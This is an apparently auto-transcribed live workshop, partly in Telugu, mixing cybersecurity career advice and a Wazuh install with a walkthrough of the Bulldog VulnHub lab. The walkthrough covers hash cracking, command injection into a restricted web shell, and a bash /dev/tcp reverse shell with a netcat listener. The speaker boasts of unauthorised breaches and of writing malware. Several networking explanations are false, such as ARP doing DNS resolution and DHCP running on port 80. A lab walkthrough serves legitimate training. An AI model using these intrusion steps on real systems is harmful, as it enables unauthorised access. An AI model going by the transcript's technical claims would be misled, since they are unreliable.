hey bro, you guys need to exploit. Like Fawad used to like actually practice exploit development, and he used to pen test some machines. I think we had a previous workshop which Forward took, which is one of the hardest machines, like um, which is harder than a offensive security professional level. So that is a harder machine than OSCP. We actually have that here, the wall, the one that I'm showing here. But let's put this Ubuntu aside for a while. Let's wait for this thing. It's gonna take its time to install, but let's actually start pen testing in the meantime. Once it is installed, we can actually deal with it. So how do you do some pen testing? Very first thing, when you want to practice pen testing, okay, good on you guys. The very first thing I would recommend, one of the most popular operating system is Kali Linux. So get it installed. Simple and easy. Okay. And the other thing is, get yourself a target machine. The target machines can be found on Vulnhub for free. Just go to Vulnhub. I'll show you the website as well. One of the most important websites. Simple. If you go to vulnhub.com, you'll find a lot of machines that you can practice for pen testing. Okay, go there, and this is a bulldog machine. This is a medium machine for a beginner, for a beginner like a guy who wants to start a career in pen testing. Okay, CEH or SOC, bro. First thing I'll tell you, CEH is not an entry level certification. CH is an associate and mid-tier certification, and SOC is not an entry-level job; it's a mid to associate level job. So right now, I would ask you to focus on any technical roles, technical support roles, or like Google IT professional certifications, or like Google cybersecurity professional certifications. So try having these certificates in order. Okay, try to get these 4 certifications. Write this down. Okay, I want you guys to write this down. The very first thing is IT professional Google. Second thing is Microsoft cybersecurity professional. Okay, Microsoft, not Google. Okay, Microsoft. I'll tell you why. Because most of these days you will be like dealing with Microsoft tools and Microsoft operating systems. But yeah, those are the things I want to like bring up. So Microsoft cybersecurity professional certification. Those two. And the third level is either do security plus. Okay, go complete your security plus. If you don't want to do Microsoft, if you don't want to do like Google ID professional, you can actually do CompTIA CYSA plus. Okay, that those two are your entry level certifications for an entry level job. And then you can get a Microsoft cybersecurity professional certification or a Google cybersecurity professional certification, and then you can get a, after that you need to get a security plus. So this is a proper order of a vendor certification. After security plus, what you can get, you can either get EJPT or a CPENT certifications, or like if you want to move to security architect, you can go into CIDA. So that is a proper roadmap, and those are like a that's like a proper roadmap for certification. If you want to get into any entry level roles, do not spend money on anything, not even for security plus, not even for Microsoft certification as well. Just get yourself a Google IT professional certification, because once you get an entry level role, the company will fund you money. Okay, the company will give at least $5,000 to $10,000 for your certifications, brother. Okay, company will pay you money for your skill development and for your upskilling. So you do not need to, spend money from your pocket. Once you get into that thing, that's it. Easy, brother. You do not even need any of the other certifications. Master's degree? No, bro. It's waste of time. Fawad, waste of time, brother. Do not even do that. Why do you want to do masters, bro? I'll tell you one reason why Fawad wants to do masters, bro. The main reason I did it is because I want to do a bit of field forensics, yes, because I had an opportunity to work under Robert Greene, OB, who is one of the world's number one forensic analyst. Okay, not computer forensics, it's a field forensics, where I learnt some of the forensic tactics that are being used by police and happen to investigate some crimes. So the main reason he hired me is because I'm an ex-malware author. The main reason I had the title is because I happened to do some breaches in a top company and you know report some bugs without their consent. So I got some good fines for doing that. So it's the reason I'm considered as an ex-malware author. So that's one of the reason. I happen to code some malwares. Like there are a lot of them. There are a lot of malwares I coded, like around thousand of them. So you can't find them in GitHub. Please do not even search for them. Programming languages. Okay, one of the most important things. People will say Python. Yes, Python, JavaScript. Okay, Python, JavaScript. Bash, you can learn it within a day. Do not even worry about Bash. Python, JavaScript, Python, you can learn that within a week, brother. Do not even worry about Python as well. JavaScript, Python, PHP, SQL. That's it. Easy. Easy peasy. That's it. And any doubts before we start doing some pen testing here? Alright, let me turn on my Kali Linux. Let me see if the Ubuntu is done. Hey, let's restart this in the meantime as well. This one is done. Perfect. Is programming mandatory before the knowing about the cybersecurity? I'll tell you something here. One of the most funniest thing. In Australia, there is a program called as a Women in Cybersecurity. It's actually really good for girls who are actually in Australia or who wants to apply for Australia. That's a different story. Because what happened is people in like other departments, like in hospitality or law, they happen to like fill them into our departments, like cybersecurity, by training them. Okay. Let me, let me. Yeah. Let me. Okay, what's happening here? I think we messed up with some of the configurations of the ettercap, so it's the reason it is messed up. So I'm gonna actually power off this. I'm gonna restore it to a before previous state. Let's go to Ubuntu. What is the password? I'm sorry for asking my password to you guys. You guys want a roadmap? Okay. There is one thing I don't have. I don't know if I have it now or not. Let me actually check my bookmarks. Usually I have these things in my bookmarks, but let me try finding this. No, there is one. There is one, brother. Not cybersecurity. No, this one. Paul Jeremiah Media. If this is a one, perfect. This is a proper roadmap that I want you to suggest. See, it will tell you what is a beginner certification like CompTIA A plus, CYSA, okay, CSP, Cybersecurity Fundamentals, CC. Alright guys, do you even know that there is a CC certification that you can do for free, that you can actually do for free? CC certifications. You do not even need to pay like $500. Some of my staff people are actually doing that. CC certification. This is a roadmap, and this is security plus. So these are all like entry levels, okay? And then comes something like CEH, CISSP, OSCP, ECPD, CPANT. This is something like intermediate for a pen tester. And then OSCP, okay? This is one of the thing I did, okay? And then you can get CISSP. CISSP is not even for you guys. Do not even do CISSP. CCNA is one of the best certifications for a networking, guys. You can either do CCNA or Network Plus. So I'll tell you the top certifications you need to get these days. Okay, first thing I would say, Google ID certification, Google ID Professional, or A plus or CYSA plus. If you are an entry level, okay, pay that with your own money and do them. Okay, after that, once you get into a company, then do some security plus or Microsoft cyber security professional. So you can actually do Microsoft cyber security professional from Coursera. So you can actually do that on your own as well. There are two certifications you can do it on your own. Not two, three. I mean, two certifications you can do it on your own. No, three certifications: Microsoft cyber security professional, Google cyber security, and Google ID professional. These three certificates you can learn on your own. You do not even need to go to any institute. You can actually go to Coursera, okay, and start them. And also we are actually planning to fund these certifications as well, so that's a different story. You'll be actually having 7-day free trial, so you can actually check them out. But we are planning to fund them as well. But apart from that, these are the three certifications. And also you do not even need to have any certifications. Once you get into a company, the company will pay for your certifications. So I did by the time I went into a company, all my certifications are expired. So simple, easy. Do not even need a certifications. All you need is a proper work experience these days. And how many internships you did, and how many you know, what do we say? How many proper skills you have? Like how tailored is your resume for an entry level job? Those are the things people want to see. That's it. Easy. Once it catches an eye of a, you know, once it catches an eye of an HR, that's it. He's gonna take it. He's gonna, grab that opportunity for you. He's gonna like hire you, and there will be like some technical rounds. After that, you will be having an interview. I mean, yeah, for those who are taking our course, we are actually helping them to like do the interview. We have like a lot of interview questions at our hand, so that's another thing. So let's click on next. Ubuntu, skip for now, finish. That's it, done and dusted. The very first thing, right click and click on terminal. Okay, sudo su, and now this is desktop, right? Let's actually put it in a scaled mode and maximize this. Let's actually arrange this desktop display settings, because the display doesn't look good, and change it to like I'll change it to my 1920 into 1080. This is my default display. Keep changes, close it. So I'm gonna maximize this. So what I need to do is, very first thing, open up your Firefox. Okay, simple. Search in as a guy who just know about the tool. Wazoo install. Simple. Spelling mistakes, but Google's gonna autocorrect, of course. So click on install, and then once you click on install Wazoo, no, do not even worry about that. Let's go to install Wazoo. We're gonna see let's see what we can find. Let's go to documentation, the best thing. Go to documentation, click on quick start, and then in the quick start, it is going to tell you what is the things that you need. 4 CPU and 8 gigs of RAM, 50 GB storage, but we only gave it 4, but still it's going to get installed. Let us see what I can do. I'm going to actually close this, and I'm going to I'm going to give it a bit more RAM. But before that, let me see if curl is working in my thing. Curl, it's not working. abd install curl. Perfect. So those are the basic commands to install an application. So simple. apd install and then the application you want. If you do not know the spelling name, you will make a mistake, but the terminal will show you the correct name once you make a mistake. Let us type something. Okay. I typed in go booter. You cannot find anything called as go booter. Okay. It is actually go buster. I mean, Kali shows, but I don't know why Ubuntu is not showing. See, simple. Type in apd install and the tool name. It's going to actually install that. But right now, the kernel has been installed. So let me give it 8 gigs of RAM. And then we are going to actually restart that virtual machine. But in the meantime, I had 2 of them open. Okay, perfect. Let me close one of them. Let's power on my Ubuntu and let's start this thing. See, here are the certificates, but programming languages, when they are telling you to learn programming languages here, bro, for some of those who ask, when you are in an intermediate level, okay, simple. So as an entry level guy, you do not even need to have any knowledge on programming because you're gonna start as a technical specialist or a Linux system administrator or a network administrator or a network engineer or a network support officer as an entry level role. See, you need to apply for entry level roles, bro, to get into cybersecurity. Once you have like 1 year of experience, you will be like automatically like shifted to the other teams based on your performance and how good you're doing at a job. Or else there will be some jobs like junior security engineer. Yep, you can find those things as well. But while you're doing in, I mean, you're gonna, once you do an internship at insec, you're gonna actually have work experience, right? Like for example, the internship is for 6 months, so usually they ask you for 6 months of work experience, but they are like 2 internships, so totally you would be having like 9 to 6 months of experience, and then you can actually like start applying for jobs using that to get a cybersecurity jobs within India as well. Easy. So these are other stuffs that I'm telling you, like what we do as well on the other hand. And also we are recently doing an internship. We are currently having interns. I think it's being handled by Fawad. They are learning much advanced stuff like SIEM, Alien Vault, Splunk, Gidara, malware analysis, static and dynamic analysis. So those are all the things that they are doing. Now sudo su to go as root, and then you need to type your password. Simple. Once you are root, go to Wazoo documentation. I think we forgot to change it. My bad. Sorry. Go to settings. Motherboard. It's all good. Yeah, 4 is enough. By default, it's taking 4. So we do not even have to worry because it's actually working so smooth. So I don't want to disturb it. Let us actually run with 4 with lower system requirements. How to join the internship, bro? Bro, for that you need to, be in that course. Once you're in that course, then based on your performance and all, we're gonna start the internship early as possible because see, most of you guys will not be starting the internship as early. Like some of them will be starting after 1 month, 2 months because based on their skills, and some of them might start after like 4 months because see, they might be like first year students, or some of them might be like starting at 6 months because like they are from like literally completely mechanical background or something who doesn't even have any knowledge in cybersecurity. Depends on person as well, bro. Because see, I don't want to put anyone on an internship once you like join the course because see, it's gonna take a really good toll on you. It's not gonna be that easy. My internships are like really not easy. The tasks are like really hard, and you need to like learn a lot of stuff before you do go on an internship because those are the things that you need to learn because I'm actually teaching you guys every day. Simple curl and click enter. Okay, that's it, done. Simple. It's gonna take some time and then it's gonna install that. But in the meantime, installing Guac, it's one of the thing that comes with curl. Okay, and it tells that the web interface port is 443. Can anyone tell me what runs in port 443? This is a SOC tool I'm teaching you. This is a free SOC tool, guys. Okay, get this tool because most of the SOC tools are going to cost you like $500 a month, $300 a month. So $300 or $500. For example, 500 into 80, 40,000 or like 45,000, something like that, because US dollars is somewhere around like 85 these days. Good, Deepali. Nice. HTTPS service. See, it's actually installing HTTPS transporter, and also it's getting configuration files, it's getting root certificates. So when you are installing something, there is a hierarchy of certificates: root, admin, user, agent, and vendor. Okay, it's going to install all these certificates. If these certificates are corrupted, it means that someone is trying to hack you. You can actually hack someone using by sending the false certificates, and then manipulate these people by believing that okay, this is a proper root certificate and you have to give me root authority, and then this person who's running this tool will be having the root authority, so he's going to automatically run this as a root, and then he can actually exploit the system by using a bit of parameter tampering, or like by doing a bit of reverse shell to get access to this terminal, or by executing a malicious code. These are all kinds of attacks that you're going to learn while doing some adversary simulations when you're working with us. So this is not these are not small things. So you're starting from a beginning level. So very first stage you're going to learn ITLM, and then networking, and then a bit of ethical hacking. After that, okay, everyone's going to teach you ethical hacking, but then the real game starts: the cyber security, risk management, governance, and then you're going to do a lot of practicals. There are like, I gave my students like last week up to like 100 tasks on Windows PowerShell. I mean, people need to practice PowerShell. PowerShell is one of the most important tool if you want to become a Windows system administrator, and also if you want to get hired by a Microsoft. Trust me, PowerShell. We're going to teach you that as well. So you'll be learning PowerShell. So there are a lot of things. See, it's not that easy. So let's minimize this. Let's go back to Kali because it's going to take some time to install. So before that, let us turn on the Bulldog network. It's on bridge adapter. Let's turn on our target machine. So I'm not closing this. Let's start this. I think we need to start this again. Internal error. Perfect with network adapter. So let's start this again. Hopefully this one might work now. Usually this is the error that we used to get always. There might be some problem with adapters, but if it doesn't work, we have like someone to volunteer. Bingo, it's working. I mean, this one is actually using an Ubuntu. So this is a vulnerable machine. It means that this machine has some vulnerabilities, and you need to exploit this and find it. Bro, you don't want to go on to someone's website and exploit that. When you are like exploiting, people are going to actually know what you're doing. Okay, so when you are actually trying to do some brute forcing, then it's going to like show up in the logs, like for example, 2:11 a.m. date 29th of 11th, and at this time the person tried to hack. So if, for example, the IDS is gonna search for patterns in such a way, like for in a minute people tried like people in a minute, if the person had like 20 to 30 password failures, it means that IDS is going to think this person is brute forcing, and it's going to simply block your IP. So the IDS is one of the most powerful device. So just close this one and let's run our Kali. Let us see Ubuntu. It is still running, starting service. Let's wait for this one. Anyone having any doubts, brothers? Come on, guys. You need to ask doubts. Doubts are the most important things. A doubt is one of the most important thing as a hacker. All right, see? We already had something running here. Let's actually clear this. We're actually doing some ARP poisoning. We're changing configurations and we're playing around. I'm gonna close this, okay? We're searching for SSL strips to, manipulate that. But right now, let's get into my Kali terminal. Open up your root command and open up your root terminal. I don't know the password of root. I mean, I know it. I'm just telling I don't know. Let's actually maximize this. So how are you going to find out something that is within the same network? So it means that so you need to there must be some DNS. Okay, domain name service is one of the things that plays a major role. Okay, domain name service, DNS resolution is done by ARP. Okay, for example, I'll demonstrate something. Okay, let us take some Cisco packet tracer. This is a bit of networking concept I want to teach you now. We're taking a Cisco packet tracer. This is where you guys can practice networking as well. I'll show you something here. So usually you need to find out the things within your IP, you need to do an ARP scan with a parameter called as L. Okay. Once you do an ARP scan, it's going to give me the list of interfaces. See, what is the IP of my target machine? How do I find it out? So the very first thing I can see is a couple of MAC addresses. So you can see the MAC address of a target machine. Let me go to my bulldog. Okay, bulldog, it is in my virtual box. Go on to bulldog, click on right click on settings and go to the network, and in network, it's not gonna show here, but previously in the older versions it actually shows. Or else you can actually check here, it's 18, but usually you can do some bit of nmap scanning on both of these to find out. You can do some enumeration, like for example, let us take this. Okay, so the very first thing I'll do once I find out the IP is to run some scans to see what exactly this thing is running. Okay, and then the IP address. Bro, array, what you guys are running, man? I don't even understand. SS is for stealth scan. It means that it's going to do some SYN scanning. SYN means you're sending a packet. Okay. For example, me and Sankalp, we meet for the first time. Okay. And then what I would say, I would give a shake hand. It means that he's gonna give me a shake hand back. So it means that SYN means I'm actually trying to establish a connection or trying to communicate. Acknowledgement means okay, the connection has been successful, and then he's actually accepting the connection from the other end. And then there is something else, RST. RST means that the other guy doesn't want to communicate. So there are three kinds of packets. Okay, SYN, acknowledgement, SYN-ACK, and RST. These are the main things when it comes to networking. Once you click on that, it's going to run the nmap scan. So let us see how much time it's going to take. It's going to take a lot of time for this, definitely. I bet that. It's going to take at least 2 minutes for this scan to be done. So let's leave it like this. And oh no, not 2 minutes. It's almost done. 98%, 99%, 99. So here we have 3 ports that are open. 23, which means telnet. See, the main reason I used S is because see, I want to run some scripts on this. Okay, when I run all the scripts on it, there are some scripts that are used for enumeration. Aggressive scan is just to make your scan a bit quicker, brother. Aggressive scan is just simple like a normal scan. Okay, those are just bunch of commands. Once this workshop is done, I'm gonna send in some cheat sheets so you guys can find out how to use a particular scan. Okay, 23 is for telnet, 80 is for HTTP, 80 is for HTTP proxy. So these are all couple of things that are here. Okay, and also it gave me the MAC address as well once you scan the IP. Simple. So you can actually confirm this MAC address from here. So it actually matches it with this one, B732C4. B732C4. Done and dusted. We got the MAC address. We had 23. 80 and these kinds of ports that are open. So I'll show that DNS as well here. So DNS means you have a router and you have a computer, like you have like couple of computer, couple of devices. Let us consider these all are like my virtual machines. Let us consider this is a virtual environment. Okay, this is Kali, Ubuntu, and Bulldog. Okay, these are the three machines I had. So let me actually arrange them properly. So it's going to be looking a bit decent. So I'm actually like connected by means of a router to all this. So let's add a thing called as a virtual box. Let us consider virtual box as a proper switch or something like that. Let's take a switch. Okay, let's draw some connections. Let's do some automatic connections. ISR router from switch. The very first second connection here, here. But let us take something else, DNS, which is a domain name service, which is being provided by your internet guy to assign a dynamic IP. Okay, to assign a dynamic IP. So here in the DNS, okay, first thing you're gonna configure, you need to configure the router. Every router has a gateway. Okay, so let us consider our router's IP address is what is the interface that is. If you see here 000, okay, go there 000. Let's give an IP 192.168.20.1. Okay, let's turn this router on, and this is the router's IP address is the gateway for everything here. Okay, the next thing you're gonna go here is, and you're gonna configure this one's IP address as well. Okay, you're gonna configure this statically. Click on desktop, click on configuration, and click on static, and the default gateway is here, and the IP address is going to be the next letter 20.2, and the gateway, it means that this everything, the packets are going through the router. Simple. In the services, okay, turn on DNS, click on turn on, sorry, DHCP, domain name service. It means that usually DNS runs along with the DHCP on port 80, so you need to turn on DHCP and you need to enter the default gateway, which is 20.1. And DNS, you do not need to run any DNS here. DNS server, we do not have any DNS, so we are using a DHCP here, but it works with the DNS in this company, sorry, in this virtual machines, because every virtual machine has a IP address, and that IP address is used as its own DNS. So let us consider 512 users, and this is the gateway, and this is the starting IP address. We took 2 as well. Let's start with 3. This is the subnet mask. That's it. Pool name already exists, so let us save this pool. Done and dusted. Let's go here. Okay, let us turn this on. So let's go to desktop, IP configuration, click on DHCP. Once the DHCP is done, it's going to automatically request the IP, and you see here there is automatically an IP is assigned. So when you're doing a DNS resolution, there will be DHCP requests that are going to take place, and then it's going to give an IP automatically. So here the same thing happened, and Bulldog got an IP of 20.18, and my router's IP is 20.1. Easy. That's how it's going to work. So let's close this one for a while. After that, I'm going to show you. So we have like port 80. Port 80 is running, means it means that there is a HTTP server or HTTPS, but I mean it's obviously HTTP port 80. So how can you know like if there is anything that is running? Simply, okay, copy this one and paste it here. So once you're copying this one and pasting here, it means that the HTTP dot this whole thing is called as the reverse DNS. If you check this, okay, they are telling that their website has been hacked, and this is a Bulldog. Thank you for visiting Bulldog Industries. We are the number one high quality English Bulldog photography. So this is a Bulldog photography website. I'm going to click on public notice to see what happened. So they discovered a breach in their payment card systems. Okay, it means that one of the compliance systems like PCCI DSS that is compromised. And to prove Bulldog Industries, they hired some new staff. Zuckerberg, they know their staff security won't be enough, and Winston Churchill, something and all they chucked in. How do you find out more information from this? So this and this. So as a hacker, you want to hack their company so bad. So what are the things that you're gonna do? You're gonna run some tools called as Direbuster or Direby. Okay. Copy the IP. So it's not working like this. So I need to paste it as HTTP and the IP. So which means that it is a reverse DNS when you're pasting with HTTP. So when it is a normally like 192.168, it means a DNS, and when it is with HTTP, it means we are actually doing a reverse DNS. Direbuster and type IP. That's it. Direby is gonna start some keywords and find out some of the other directories here. Okay, it's gonna search for web directories. So what is a directory? In your computer, usually you have like couple of folders. Okay, home is a starting directory. C, if you see here, everything is in this format as well. C, program files and voice query. Okay, same thing is in the website as well. If you see 192.168/notice, under notice there are like other subdirectories. Okay, that's how it's gonna work. So right now we got some couple of directories, robots.txt. So there are like response codes. If it shows 200, it means that it is working. Okay, if it says 304, it means it's going to take a time. 403, it is not working. 404, not found. So we had something with 200. So it is a robots.txt. I'm actually copy pasting it to see what happened here. Yeah, is saying like German Shepherd hack team, you got owned. It means like he's bullying me, telling that you cannot find a hacker. So he's just mocking me. వాడు ఇట్లా బెదిరిస్తున్నాడు నన్ను, అరే నువ్వు నన్ను ఫైన్ చేయలేవురా బాయ్ అనుకుంటా, ఇట్లా సింపుల్. ఓకే, let us see something. We have like something like admin login and admin. Let's go to admin and see what we can find. Okay, copy. Let's navigate to some directories. We got username and password. Okay, but let us see what we can find here. There is nothing. And let us see if we can find anything. Admin, and there is a page called as developer, dev. We got a login. Okay, login panel here, but let's go to dev. If we see here, okay, I'm your new boss, Alan Brook. So every time, the very first thing I want you to do when you find a web page, okay, always search for robots.txt or the file extension site, okay, sitemap.xml. What does these things do? Robots.txt will tell what agents it is allowing. Sitemap.xml will tell, okay, what are the things that this person happened to visit. Okay, so that's one of the most important thing that you guys need to understand. So here we have like couple of important details. They are just putting their user details outside. Simple, just copy paste them to see if you can actually reuse them later on down the line. So always keep the important data. Data is always important, like usernames, password or something, because see, those are the most important things. And there is a web shell. Let's open this in a new tab. Please authenticate with the server. So Django is server they're running. Okay, if I authenticate here, I might get access to this web shell. But right now, so what you can do is like, sorry, control right click, view page source. Okay, once you click on the page source, can you guys find any important information here? Once right click and check the page source. What did you find here? Guys, come on, I need the answer from your mouth. What you guys found here? Nitish, come on, tell me.
We got email IDs at the front end and back end. No?
Bro, what about this one? What is it? What is this thing? Hashes, Q
Hashes.
card, yes.
Yes.
Hashes, brother. Hashes are the most important thing. We even get hashes. So what I'm gonna do?
Yes.
How do you crack a hash? Copy this. There is an online
Just
website.
decode it.
You do not even need to
Station.
worry about much. Crack Station, Arun Naidu, what's up, bro? Long time no see. Arun Naidu is one of our oldest guy. ఎప్పటి నుంచి ఉన్నావు అరుణ్ ఇక్కడ ఎన్నేళ్ళు అవుతుంది 1 ఇయరా ఇంకా 1 ఇయర్ అయిందో లేదో నాకు తెలియదు యానివర్సరీ నీది సెలబ్రేట్ చేసుకుందాం అందరం కలిసి
8 months, bro. 8 months.
8 months యానివర్సరీ ఆవు బ్రో ఇంకా 4 months యానివర్సరీ చేస్తాను ఇది సో పేస్ట్ ఎవ్రీథింగ్ ఓకే యూ కెన్ పేస్ట్ అప్ టు 20 hashes కాపీ ద hash paste it in the crack station and try copy everything అరే ఆల్రెడీ కాపీ చేసినాం థర్డ్ ఫోర్త్ పోదామా ఫోర్త్ okay see this is there are some tools as a hacker you need to know okay when you're practicing and practicing you will gain all these skills like what I'm doing here click on this okay once you click on this crack hashes easy so it found hashes for the last two who are the last two here Nick and Sarah so Nick I'll write it down and we have a password called as bulldog simple password I think Nick loves bulldogs okay what about Sarah Sarah, she's a bulldog lover. She's much she loves bulldogs more than Nick, if I'm not wrong. So it's the reason she might have chucked in the name. So these are the passwords. So what I can do is I can simply go here. Okay, go into the login side. Username Nick. What is his password? Bulldog. Okay, I logged in. It says that I don't have permissions to edit anything, but here the web shell told me if I authenticate here, I might get access to this server. Let me refresh this. See? There is a web shell. You can run a couple of commands. Okay, it will prevent the run user from running dangerous commands. So you can only run these 5 commands. With these 5 commands, can you actually hack a computer? Can anyone tell me? Can anyone tell me with these 5 commands, can you actually hack a computer? Yes, how? You got bro. LS? That's it. Let us run cat. Okay, let us run another command. Cat manage dot py. It is showing something that you guys do not even understand. It's actually importing environmental variables for Python. So that's it. What about let us run pwd. Pwd showed who is the user and what is the directory. But what about let us run okay mm, something like nano and I want to create a reverse shell. And see it says invalid command. I cannot run those commands. That's one of the problem here. Let me do some netcad and see. See, I cannot run these commands. So what's going on? So how can I actually do something here? Let us actually inspect this to see if we can do anything here. Or else like control G. See, you need to see this is when you're doing pen testing, you need to have a knowledge on programming. It's one of the reason pen testing jobs are not entry level, brother. Okay, for pen testing recently, I'll tell you something. If you go into LinkedIn and go to a Tech Mahindra website, okay, if you go to Tech Mahindra website, so what happened is for a pen tester role, you need like at least 7 years of experience, man. It's not that easy. So that's how it's gonna happen. So forward is like giving a reverse shell. Do not worry forward. Work 2 years in a work 2 years in any entry level role and then sorry in software testing role for 2 years and then you can actually like uh, get reference from your manager and like get internally hired. So for internal hiring, it's gonna take like 3 years. If you want to go for a different company, it's gonna take you like at least 7 years. So try to find a better company at the beginning. Easy. That's what I would recommend for everyone. Arey forward the reverse shell, huh? Okay. Let me type something. Let us see what we have here and how this is working. I'm trying to run two commands at the same time. Try to see if there is any vulnerability. See, if I try doing anything crazy, it's gonna actually close it. Okay, simple. So let us see something. I can't run two commands. So if I run get, it's actually closing. Okay. Duplicate. Let us see if there is any duplicate server error. See, we can't do anything like this. So what's going on? What can we do now? Let's go to a different directory. See, I cannot even change my directory. What should I do in this case?
Removing the existing directories.
Okay, see, you can only run those 4 commands. Let us see something else. Okay, cat and see invalid command cd, but let me actually click on run here. Let's actually reload this page. So this one happened to stuck here. So when I'm running nano, it is stuck. It got stuck. It means that it is actually trying to execute any second command here. So try command. Okay. So these are all the things. So you need to understand how the system is working. So it's actually executing the second command. Okay. With any other parameter, like it's actually executing second command other than the given command here. So it means that you can actually run a second command here. So that's how it's gonna work, brother. Okay. Let us see what we can do here. Ford, do you know the reverse shell that we used? Any idea?
I guess this one which I shared in chat.
Good boy. I know you. I know that you love to use reverse shells. One of the most important things as a hacker you need to know. So what is a reverse shell? So shell is like two types, bash and sh. Okay, bash is like a old shell. Okay, normally this is a new shell. So something like that. So these are something that you guys can do. So you guys can actually run a payload, and also on the other hand, you guys can actually, you guys can send in a payload, and or else you can actually run a payload, something like that. Okay. So how do you do that? So simple. Let us actually go and find some reverse shells. Reverse. So usually, okay, the best thing I would say is to like do not try to remember all the reverse shells. It's not gonna, you won't even remember anything. Okay, simple and easy. You won't even remember anything. So how are you gonna run this whole thing? Forward, do you know how to run this? So the very first thing I'm gonna do is I'm gonna listen
Yeah,
to what
try
exactly.
end or semicolon.
Yeah. Okay, I'm listening to anything that is on port 4444. So let us actually copy this. And so what is my IP. Before that, I need to know my IP because I'm actually trying to do a reverse shell into my IP. So what is a reverse shell? Okay, most of you guys will be having it out. So reverse shell is one of a privilege escalation technique or one of a technique to hack into a system. So you will be getting access to one of the your target machine's computer. So here I'm in a target machine. From target machine I want to get access to my computer. So this is a different story. In a reverse way we are trying to attack. Okay, we're trying to attack in a reverse way here. So here what I need to do for that, first thing I need my IP, so that's how I can connect or send my files to. Okay, so ifconfig please work. So this is my IP 198.120.168.20.6. So what I'm gonna do is simple. I'm gonna go to web shell. I'm gonna I'm gonna log out of this just for a second and then close this. So before that I'm gonna go to the dev, okay, developer website, and I'm gonna click on the web shell again. I need to authenticate. All I know is like a login again. I'm gonna go to nick. Okay, nick password is bulldog. So there are a lot of things that you guys cannot understand while you're pen testing, because pen testing is not easy. That requires like a lot of experience. So what I'm gonna do, ls and bro forward. This is a reverse shell, right? That you want to execute.
Yes.
And what is your IP here? Okay, this is your IP. Let us try to run this. What mistake you did forward here?
Show me your command.
See, there is something that is missing.
You are not writing it in bash C. It should be run in bash shell.
Good boy. Okay, you're running this thing in a bash shell dash c, and you're gonna give this. If it doesn't work, you're dead forward today. Okay, simple. So what is that? This is the reverse shell we created. Array, this is the reverse shell forward created. Okay, if this doesn't work, we are gonna beat forward today. Sure, this one's gonna work, because see, there is something I'm thinking you made a mistake here. Hey, forward, come on, man. What happened to you? Forward, what
Bro,
happened, bud?
try my one. It's a bit different from my one.
Hmm?
I'm sending you again. Try
Sending you
this
again.
one. Your shell is bit change. I guess it's
Bash dash I dev TCP. I'm using the IP TCP slash IP. Okay, IP is this is the one 192.168.20.6 and 4444. Hmm. Zero grade zero. Okay, okay, okay. Let us see. Let us see. There is something else as well. Apart from this, let us try some other reverse shells as well. We can actually use this one as well. If there is a netcat that is running in a production system, or else we can actually do, if this reverse shell is not working, let us do something else. Reverse shells, let's find some reverse shells online. See, I have no idea what I'm doing. So as a hacker, you know a tactic. That's how you're gonna exploit into systems. Okay, I mean, I solved this mission before, but for some reasons usually you You guys cannot remember. Just like me, sometimes I don't remember what I'm doing, like the reverse shells. Let's go to reverse shell. Please show me the reverse shell. Hey, forward, you idiot. This is the same thing that I said. This thing we need to do here.
Bro, I've used this one. This one was working.
Bin bash. This one, right? Arey, forward, if this one doesn't work, I'm killing you, okay, today. And let us actually end this here. Alright, guys, 0 less than 1, 0 greater than 1, do not worry about that. Okay, that's a standard input and output. And forward, if this one doesn't work, you're dead, man. Okay, see, just in case, bash I c ls bash dot c. Probably I need to type double and here as well. Do I need to?
No, I guess it's perfect.
See, we're still getting server error.
Bro, try pipe, bro. Try pipe instead of end.
And this one, pipe's not gonna work, brother.
Yeah, piping. Yes.
Piping is not working here. Alright, guys, if you find this one, you're legend, man. Like, anyone tried to find a proper reversal command? Anyone can find that. Come on, guys.
Now, could you try with a single code?
Try it a single code. What do you mean? Yo, single
Yeah,
code.
the before numbers. Yeah.
Yeah, easy, man. You guys will understand the logic now. Hmm? Why are we having a server error?
Maybe you are not specifying any file after get. So try ls.
What do you mean?
Particularly, you didn't mention any file which need to be open.
Good job.
That's
Yep,
maybe a
yep,
possibility.
yep, yep. Let's see, let's see. Let's actually open the Python file. Now I'm just, making I know the answer, but I'm just gonna make mistakes until you guys tell me. Because cat and what do we have? Manage.py. What's happening? Come on, guys.
Bro, I guess you are doing typing mistakes in bash shell.
Array, I'm not typing any mistakes, brother. I'm a good boy. I know how to do this. Bash, come on, tell me. I love you guys. Come on, bro. See, it's an easy thing.
Then try or, bro. You tried and then now try or.
Or means what? What is or?
Or means double pipes.
Double pipe. What do you mean by double pipe?
You were trying double end, so now try
Hmm?
this one.
Which one? Double and. Okay, okay, okay. We'll do that. Just for you, brother. Just for you, just for you. What happened here? See? No communication, man. Why? Why there is no communication? In the meantime, let's go back here to this Wazuha to see what we are doing. In the meantime, Fawad, think about the proper answer. So this is a tool that I told you, right? Let's close this. This one did not get installed as well. Interesting. Removing file bit, removing Wazuha manager, removing indexer, generating certificates. Let's leave it like that. But yeah, anyone has any doubts until now? Let's actually restart the Wazuha. See, but this one is working. So what you can do from your forward? If this thing is working, so usually it's catting the first command, but after this one, it is excluding this one. It means that it's not even like caring about the other one. So whatever you run after that, it's not gonna look at that. So it means that there is an error here. So what can you do here? Bro, single parameter, bro. I'm sorry. See, we got axis here. Array, 1 is equal to 1 dot dot not, bro. It doesn't work like that always, okay? That is for a different machine. See, one single mistake can mess you up. Dash, see, ఇక్కడ స్పేస్ లేదు అందుకు పోయింది ఓకే we got access to this
Yeah,
idiot the
that's why I
bulldog.
was saying.
We got access to this guy. What to do once I get access to someone? Ls, okay, see who am I? No tty shell present. It means that no tty shell present. So you want to make the shell more interactive. So what is a tty shell? Can anyone tell me what is a tty shell? There are a lot of things that you guys
Yeah,
need to learn. Okay.
bro, it creates a virtual, I guess, virtual terminal, pseudo terminal, when we use Python.
It creates a proper terminal. Okay, it creates like a terminal that can be like more interactive, where you can like run something
Yeah,
back in Unix.
virtual
Okay,
terminal.
